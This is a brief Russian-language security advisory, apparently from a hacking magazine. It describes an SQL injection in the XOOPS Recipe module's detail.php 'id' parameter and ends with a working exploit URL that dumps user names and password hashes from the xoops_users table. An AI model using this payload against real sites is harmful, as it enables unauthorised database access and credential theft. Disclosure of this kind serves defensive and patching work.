Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: XOOPS Module Recipe
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием detail.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2F select/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*